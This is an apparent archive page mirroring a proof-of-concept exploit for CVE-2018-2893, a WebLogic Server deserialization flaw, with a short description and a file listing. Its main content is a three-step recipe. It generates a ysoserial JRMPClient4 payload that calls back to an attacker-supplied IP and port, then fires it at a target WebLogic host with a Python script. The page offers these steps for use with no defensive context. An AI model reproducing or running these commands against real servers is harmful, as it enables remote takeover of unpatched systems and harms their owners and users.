CVE-2018-2893 PoC — Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞

Source

https://github.com/artofwar344/CVE-2018-2893

Associated Vulnerability

Title:Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞 (CVE-2018-2893)
Description:Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server，影响

Description

CVE-2018-2893 PoC

Readme

# CVE-2018-2893

## Step 1

`java -jar ysoserial-cve-2018-2893.jar`

```
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 @pynerd
     JRMPClient3 @pynerd
     JRMPClient4 @pynerd
     Jdk7u21     @frohoff
```

## Step 2

`java -jar ysoserial-cve-2018-2893.jar  JRMPClient4 "<ip>:<port>" > poc4.ser`

## Step 3

`python weblogic.py <host> <port> poc4.ser`

File Snapshot


 [4.0K]  /data/pocs/8f6f4c07046a9850d6250bce76c6036893470f20
├── [ 539]  README.md
├── [5.3K]  weblogic.py
└── [7.0M]  ysoserial-cve-2018-2893.jar

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!